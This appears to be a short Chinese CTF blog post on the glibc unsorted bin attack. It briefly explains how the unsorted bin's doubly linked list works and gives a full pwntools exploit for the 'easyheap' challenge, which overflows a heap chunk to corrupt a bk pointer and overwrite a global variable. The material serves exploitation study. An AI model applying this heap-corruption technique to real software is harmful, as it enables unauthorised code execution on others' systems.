Unsorted Bin 双向循环链表,先进先出
如果unsorted bin中只有一个chunk的话,chunk的fd、bk指针都指向main_arena+偏移:
https://mp.weixin.qq.com/s/1KhiulR-webHsBZhUzQzKg
https://blog.csdn.net/qq_36495104/article/details/106246762
from pwn import *
import sys
import time
#context.log_level='debug'
#p=process("./easyheap")
p=remote("redirect.do-not-trust.hacking.run",10413)
e=ELF("./easyheap")
#context.terminal=["gnome-terminal","-x","sh","-c"]
#gdb.attach(p)
def create(size,content):
p.sendlineafter("Your choice :","1")
p.sendlineafter("Size of Heap : ",str(size))
p.sendlineafter("Content of heap:",content)
def edit(index,size,content):
p.sendlineafter("Your choice :","2")
p.sendlineafter("Index :",str(index))
p.sendlineafter("Size of Heap : ",str(size))
p.sendlineafter("Content of heap : ",content)
def delete(index):
p.sendlineafter("Your choice :","3")
p.sendlineafter("Index :",str(index))
fd=0
magic=0x6020c0
#start to attack
create(0x10,"a"*0x10)
create(0x80,"b"*0x80)
create(0x80,"c"*0x80)
delete(1)
payload="d"*0x18+p64(0x91)+p64(fd)+p64(magic-0x10)
edit(0,0x30,payload)
create(0x80,"aaa")
p.sendlineafter(":",str(4869))
p.interactive()
标签:unsortbin,index,create,content,attack,0x80,str,sendlineafter From: https://www.cnblogs.com/iGhost/p/16911507.html